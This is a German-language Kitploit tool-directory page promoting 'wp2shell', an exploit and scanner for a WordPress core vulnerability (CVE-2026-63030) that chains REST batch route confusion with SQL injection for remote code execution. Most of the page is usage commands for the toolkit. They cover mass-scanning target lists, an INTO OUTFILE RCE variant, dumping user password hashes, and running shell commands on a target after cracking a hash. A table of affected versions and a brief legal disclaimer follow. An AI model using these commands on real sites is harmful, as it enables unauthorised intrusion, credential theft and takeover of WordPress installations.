Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
wp2shell — wp2shell - WordPress CVE-2026-63030 Exploit & Scanner | Kitploit
Tools/GitHubGitHub/lutfifakee-project/wp2shell
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHublutfifakee-project/wp2shell

wp2shell

wp2shell - WordPress CVE-2026-63030 Exploit & Scanner

Repository anzeigen
61vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔍 wp2shell - WordPress CVE-2026-63030 Schwachstellen-Scanner & Exploit

⚡ Schneller Echtzeit-Schwachstellen-Scanner & Exploit für CVE-2026-63030 (wp2shell)


📌 Überblick

wp2shell ist ein umfassendes Toolkit zur Erkennung und Ausnutzung von CVE-2026-63030, einer kritischen Schwachstelle in WordPress, die nicht authentifizierten Angreifern die Ausführung von Remote-Code über REST-API-Batch-Routen-Verwechslung in Kombination mit SQL-Injection ermöglicht.

🔍 Was ist CVE-2026-63030?

CVE-2026-63030 (wp2shell) ist eine kritische Schwachstelle, die von Adam Kues (Assetnote / Searchlight Cyber) entdeckt wurde und den WordPress-Core betrifft. Sie kombiniert zwei Fehler:

  1. GHSA-ff9f-jf42-662q - REST-Batch-Routen-Verwechslung
  2. GHSA-fpp7-x2x2-2mjf - author__not_in SQL-Injection

📊 Betroffene Versionen



📦 Klonen & Setup

root@kitploit:~
# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell

# No dependencies required - uses Python standard library only!
# Python 3.7+ required

🛠️ Enthaltene Tools

1️⃣ wp2shell_scanner.py - Schneller Scanner

Multithread-Echtzeit-Scanner für großflächige Schwachstellenerkennung.

root@kitploit:~
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt

# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test

# JSON output
python wp2shell_scanner.py -f list.txt -j

2️⃣ wp2shell_intooutfile.py - INTO-OUTFILE-Exploit

Demonstriert die INTO-OUTFILE-RCE-Variante (erfordert MySQL-FILE-Privileg).

root@kitploit:~
# Single target
python3 wp2shell_intooutfile.py https://target.com

# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10

3️⃣ wp2shell-exploit.py - Einzeldatei-Exploit

Portable Einzeldatei-Version des Exploits mit voller Funktionalität.

root@kitploit:~
# Check vulnerability
python wp2shell-exploit.py check https://target.com

# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users

# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint

# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"

⚠️ Rechtlicher Hinweis

WICHTIG: Dieses Tool dient nur zu Bildungs- und autorisierten Testzwecken.

  • Nur auf Systemen verwenden, die dir gehören oder für die du eine ausdrückliche schriftliche Genehmigung zum Testen hast.
  • Unbefugter Zugriff auf Computersysteme ist illegal.
  • Die Entwickler übernehmen keine Verantwortung für den Missbrauch dieser Software. Nutze es verantwortungsvoll und ethisch.
Tool herunterladen
VersionsbereichAuswirkungStatus
6.9.0 - 6.9.4🔴 RCE (Kritisch)❌ Verwundbar
7.0.0 - 7.0.1🔴 RCE (Kritisch)❌ Verwundbar
6.8.0 - 6.8.5🟡 SQLi (Hoch)❌ Verwundbar
6.9.5+ / 7.0.2+✅ Gepatcht✅ Sicher